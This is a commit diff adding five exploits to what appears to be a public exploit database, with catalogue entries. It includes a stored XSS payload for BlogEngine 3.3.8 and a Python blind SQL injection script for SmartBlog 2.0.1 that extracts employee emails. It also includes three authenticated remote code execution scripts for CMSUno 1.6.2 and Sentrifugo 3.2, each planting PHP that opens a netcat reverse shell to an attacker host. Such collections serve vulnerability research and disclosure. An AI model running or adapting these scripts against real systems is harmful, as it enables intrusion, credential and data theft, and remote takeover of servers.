DB: 2020-11-07

5 changes to exploits/shellcodes SmartBlog 2.0.1 - 'id_post' Blind SQL injection CMSUno 1.6.2 - 'lang' Remote Code Execution (Authenticated) Sentrifugo 3.2 - 'assets' Remote Code Execution (Authenticated) Sentrifugo Version 3.2 - 'announcements' Remote Code Execution (Authenticated) BlogEngine 3.3.8 - 'Content' Stored XSS
2020-11-07 05:01:57 +00:00 · 2020-11-07 05:01:57 +00:00 · 690eb17718
commit 690eb17718
parent 6eb03eae23
6 changed files with 316 additions and 0 deletions
--- a/exploits/aspx/webapps/48999.txt
+++ b/exploits/aspx/webapps/48999.txt
@ -0,0 +1,44 @@
+# Exploit Title: BlogEngine 3.3.8 - 'Content' Stored XSS
+# Date: 11/2020
+# Exploit Author: Andrey Stoykov
+# Vendor Homepage: https://blogengine.io/
+# Software Link: https://github.com/BlogEngine/BlogEngine.NET/releases/download/v3.3.8.0/3380.zip
+# Version: 3.3.8
+# Tested on: Windows Server 2016
+# Exploit and Detailed Info: https://infosecresearchlab.blogspot.com/2020/11/blogengine-338-stored-xss.html
+
+
+Stored XSS Reproduction Steps:
+
+1. Login http://IP/blogengine/admin/app/editor/editpost.cshtml
+2. Add content and trap POST request into intercepting proxy
+3. Add the XSS payload into the "Content" parameter value
+4. Browse to the post to trigger the XSS payload
+
+
+Example HTTP POST Request:
+POST /blogengine/api/posts HTTP/1.1
+Host: 192.168.56.6
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+[..]
+{
+  "Id": "",
+  "Title": "XSS Test",
+  "Author": "Admin",
+  "Content": "<img src=x onerror=alert(`XSS`)>",
+  [..]
+  }
+
+Example HTTP Response:
+HTTP/1.1 201 Created
+Cache-Control: no-cache
+[..]
+{
+  "IsChecked": false,
+  "Id": "357ae13d-f230-486a-b2aa-71d67a700083",
+  "Title": "XSS Test",
+  "Author": "Admin",
+  "Description": "",
+  "Content": "<img src=x onerror=alert(`XSS`)>",
+  [..]
+ }
--- a/exploits/php/webapps/48995.py
+++ b/exploits/php/webapps/48995.py
@ -0,0 +1,84 @@
+# Exploit Title: SmartBlog 2.0.1 - 'id_post' Blind SQL injection
+# Date: 2020-11-05
+# Exploit Author: C0wnuts
+# Vendor Homepage: https://github.com/smartdatasoft/smartblog
+# Version: 2.0.1
+# Tested on: Linux
+
+# Description : A blind SQL injection is present in the "id_post" parameter of the "details" controller. It allows you to extract information from the database by means of successive character tests.
+
+# POC: 
+
+# -------------------------
+# http://localhost/[script_path]/index.php?fc=module&module=smartblog&id_post=<valid post number> or {SQL}&controller=details
+# -------------------------
+# Exemple:
+
+# 1. Test if the first character of the database name is "t":
+# http://localhost/index.php?fc=module&module=smartblog&id_post=1 or substring(DATABASE(),1,1)='t'&controller=details
+
+# 2. Test if the first character of the email of the first account is "a":
+# http://localhost/index.php?fc=module&module=smartblog&id_post=1 or substring((SELECT email FROM ps_employee LIMIT 1 offset 0),1,1)='a'&controller=details
+# -------------------------
+# Script PYTHON (python 3)
+
+
+import requests, string
+from requests.adapters import HTTPAdapter
+from requests.packages.urllib3.util.retry import Retry
+
+initialUrl  = 'https://localhost.com/index.php?fc=module&module=smartblog&id_post=4329824944'
+endOfUrl    = '&controller=details'
+# Change this to http:// if the website is not in https
+protocol    = "https://"
+offset      = 0
+endData     = 0
+end         = 0
+iteration   = 0
+charList    = string.printable
+
+# The character returned by the db when you reach the end of the extracted information. In my case that was "+" but it can be "\", or " " or whatever. /!\ Just test and hange this value according to your needs /!\
+endChar     = "+"
+# The length of the page when the SQLI failed. In my case that was 16094. If the lenght of the content of the page is higher than this value is that the character tested is the right one. /!\ Just test and hange this value according to your needs /!\.
+FailPageLen = 17000
+
+
+# Mysql is not case sensitive but if the db used by the website is cse sensitive remove the following line
+charList   = charList.replace("ABCDEFGHIJKLMNOPQRSTUVWXYZ","")
+
+while endData == 0:
+	contentInfo = ""
+	iteration   = 0
+	end = 0
+	while end == 0:
+		iteration = iteration + 1
+		for elem in charList:
+			url            = initialUrl
+			
+			#This request get email of all employee. Replace the request by whatever you want but keep in mind that the script extract information 1 character by 1 character then you need to keep '+str(offset)+' and substring(,'+str(iteration)+',1). "elem" is the character tested
+			request        = '%20or%20substring((SELECT%20email%20FROM%20ps_employee%20LIMIT%201%20offset%20'+str(offset)+'),'+str(iteration)+',1)=%27'+elem+'%27'
+			
+			url += request + endOfUrl
+			retry_strategy = Retry(
+				total = 30, 
+				backoff_factor = 0.2, 
+				method_whitelist = ["GET" "POST"]
+			)
+			adapter  = HTTPAdapter(max_retries=retry_strategy)
+			http     = requests.Session()
+			http.mount(protocol, adapter)
+			response = http.get("{}".format(url))
+
+			if len(response.content) > FailPageLen:
+				print(contentInfo)
+				if(elem == endChar):
+					end = 1
+					if contentInfo == "":
+						endData = 1
+				else:
+					contentInfo = contentInfo + elem
+					break
+		if contentInfo == "":
+			endData = 1
+	print(contentInfo)
+	offset = offset + 1
--- a/exploits/php/webapps/48996.py
+++ b/exploits/php/webapps/48996.py
@ -0,0 +1,62 @@
+# Exploit Title: CMSUno 1.6.2 - 'lang' Remote Code Execution (Authenticated)
+# Google Dork: N/A
+# Date: 2020.09.30
+# Exploit Author: Fatih Çelik
+# Vendor Homepage: https://github.com/boiteasite/cmsuno/
+# Software Link: https://github.com/boiteasite/cmsuno/
+# Blog: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution_30.html
+# Version: 1.6.2
+# Tested on: Kali Linux 2020.2
+
+import requests
+from bs4 import BeautifulSoup
+import lxml
+import json
+
+username = input("username: ")
+password = input("password: ")
+root_url = input("Root URL: http://192.168.1.9/cmsuno --> ")
+listener_ip = input("Your ip: ")
+listener_port = input("Your port for reverse shell: ")
+
+login_url = root_url + "/uno.php"
+vulnerable_url = root_url + "/uno/central.php"
+
+session = requests.Session()
+request = session.get(login_url)
+
+# Get the unox value
+soup = BeautifulSoup(request.text,"lxml")
+unox = soup.find("input",{'name':'unox'})['value']
+
+# Login 
+body = {"unox":unox,"user":username,"pass":password}
+session.post(login_url, data=body)
+
+# Get the second unox value
+request = session.get(login_url)
+unox = soup.find("input",{'name':'unox'})['value']
+
+# Exploit
+header = {
+"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
+"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0",
+"Accept":"*/",
+"Accept-Encoding": "gzip, deflate",
+"X-Requested-With": "XMLHttpRequest",
+"Origin": login_url,
+"Connection": "close",
+"Referer": login_url
+}
+
+payload = 'en";system(\'nc.traditional {} {} -e /bin/bash\');?>// '.format(listener_ip,listener_port)
+
+while True:
+    body = 'action=sauvePass&unox={}&user0=&pass0=&user=&pass=&lang={}'.format(unox,payload)
+    session.post(vulnerable_url, data=(json.dumps(body)).replace("\\","")[1:-1],headers=header)
+    request = session.get(login_url)
+    text = request.text
+    soup = BeautifulSoup(text,"lxml")
+    script = soup.findAll('script')[1].string
+    data = script.split("Unox='")[1]
+    unox = data.split("',")[0]
--- a/exploits/php/webapps/48997.py
+++ b/exploits/php/webapps/48997.py
@ -0,0 +1,60 @@
+# Exploit Title: Sentrifugo 3.2 - 'assets' Remote Code Execution (Authenticated)
+# Google Dork: N/A
+# Date: 2020.10.06
+# Exploit Author: Fatih Çelik
+# Vendor Homepage: https://sourceforge.net/projects/sentrifugo/
+# Software Link: https://sourceforge.net/projects/sentrifugo/
+# Blog: https://fatihhcelik.blogspot.com/2020/10/sentrifugo-version-32-rce-authenticated_6.html
+# Version: 3.2
+# Tested on: Kali Linux 2020.2
+# CVE : N/A
+
+import requests
+from bs4 import BeautifulSoup
+from ast import literal_eval
+
+'''
+You should change the below hardcoded inputs to get a reverse shell.
+'''
+
+login_url = "http://XXX.XXX.XXX.XXX/sentrifugo/index.php/index/loginpopupsave"
+upload_url = "http://XXX.XXX.XXX.XXX/sentrifugo/index.php/assets/assets/uploadsave"
+call_shell = "http://XXX.XXX.XXX.XXX/sentrifugo/public/uploads/assets_images_temp/"
+username = "xxxx"
+password = "xxxx"
+
+attacker_ip = "XXX.XXX.XXX.XXX"
+listener_port = "4444"
+
+# Set proxy for debugging purposes
+
+proxy = {"http": "http://XXX.XXX.XXX.XXX:8080"}
+
+# Log in to the system
+
+session = requests.Session()
+request = session.get(login_url)
+body = {"username":username,"password":password}
+# session.post(login_url, data=body, proxies=proxy) 
+session.post(login_url, data=body) # Send a request without proxy
+print("Logged in to the application..")
+
+# Upload the PHP shell
+files = [
+    ('myfile', 
+        ('shell.php',
+        '<?php system(\'nc.traditional {} {} -e /bin/bash\'); ?>'.format(attacker_ip,listener_port),
+        'image/jpeg')
+    )
+]
+# r = session.post(upload_url, files=files, proxies=proxy)
+r = session.post(upload_url, files=files) # Send a request without proxy
+response = r.content
+dict_str = response.decode("UTF-8")
+response = literal_eval(dict_str) # Convert bytes to dictionary
+filename = response["filedata"]["new_name"]
+url = call_shell + filename
+print("PHP file is uploaded --> {}".format(url))
+
+# Trigger the shell
+session.get(url)
--- a/exploits/php/webapps/48998.py
+++ b/exploits/php/webapps/48998.py
@ -0,0 +1,61 @@
+# Exploit Title: Sentrifugo Version 3.2 - 'announcements' Remote Code Execution (Authenticated)
+# Google Dork: N/A
+# Date: 2020.10.06
+# Exploit Author: Fatih Çelik
+# Vendor Homepage: https://sourceforge.net/projects/sentrifugo/
+# Software Link: https://sourceforge.net/projects/sentrifugo/
+# Blog: https://fatihhcelik.blogspot.com/2020/10/sentrifugo-version-32-rce-authenticated.html
+# Version: 3.2
+# Tested on: Kali Linux 2020.2
+# CVE : N/A
+
+import requests
+from bs4 import BeautifulSoup
+from ast import literal_eval
+
+'''
+You should change the below hardcoded inputs to get a reverse shell.
+'''
+
+login_url = "http://XXX.XXX.XXX.XXX/sentrifugo/index.php/index/loginpopupsave"
+upload_url = "http://XXX.XXX.XXX.XXX/sentrifugo/index.php/announcements/uploadsave"
+call_shell = "http://XXX.XXX.XXX.XXX/sentrifugo/public/uploads/ca_temp/"
+username = "xxx"
+password = "xxx"
+
+attacker_ip = "XXX.XXX.XXX.XXX"
+listener_port = "4444"
+
+# Set proxy for debugging purposes
+
+proxy = {"http": "http://XXX.XXX.XXX.XXX:8080"}
+
+# Log in to the system
+
+session = requests.Session()
+request = session.get(login_url)
+body = {"username":username,"password":password}
+# session.post(login_url, data=body, proxies=proxy) 
+session.post(login_url, data=body) # Send a request without proxy
+print("Logged in to the application..")
+
+# Upload the PHP shell
+files = [
+    ('myfile', 
+        ('shell.php',
+        '<?php system(\'nc.traditional {} {} -e /bin/bash\'); ?>'.format(attacker_ip,listener_port),
+        'image/jpeg')
+    )
+]
+# r = session.post(upload_url, files=files, proxies=proxy)
+r = session.post(upload_url, files=files) # Send a request without proxy
+response = r.content
+dict_str = response.decode("UTF-8")
+response = literal_eval(dict_str) # Convert bytes to dictionary
+filename = response["filedata"]["new_name"]
+url = call_shell + filename
+print("PHP file is uploaded --> {}".format(url))
+
+# Trigger the shell
+
+session.get(url)
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -40813,6 +40813,11 @@ id,file,description,date,author,type,platform,port
 48990,exploits/hardware/webapps/48990.txt,"iDS6 DSSPro Digital Signage System 6.2 - Cross-Site Request Forgery (CSRF)",2020-11-05,LiquidWorm,webapps,hardware,
 48991,exploits/hardware/webapps/48991.txt,"iDS6 DSSPro Digital Signage System 6.2 - CAPTCHA Security Bypass",2020-11-05,LiquidWorm,webapps,hardware,
 48992,exploits/hardware/webapps/48992.txt,"iDS6 DSSPro Digital Signage System 6.2 - Improper Access Control Privilege Escalation",2020-11-05,LiquidWorm,webapps,hardware,
+48995,exploits/php/webapps/48995.py,"SmartBlog 2.0.1 - 'id_post' Blind SQL injection",2020-11-06,C0wnuts,webapps,php,
+48996,exploits/php/webapps/48996.py,"CMSUno 1.6.2 - 'lang' Remote Code Execution (Authenticated)",2020-11-06,"Fatih Çelik",webapps,php,
+48997,exploits/php/webapps/48997.py,"Sentrifugo 3.2 - 'assets' Remote Code Execution (Authenticated)",2020-11-06,"Fatih Çelik",webapps,php,
+48998,exploits/php/webapps/48998.py,"Sentrifugo Version 3.2 - 'announcements' Remote Code Execution (Authenticated)",2020-11-06,"Fatih Çelik",webapps,php,
+48999,exploits/aspx/webapps/48999.txt,"BlogEngine 3.3.8 - 'Content' Stored XSS",2020-11-06,"Andrey Stoykov",webapps,aspx,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,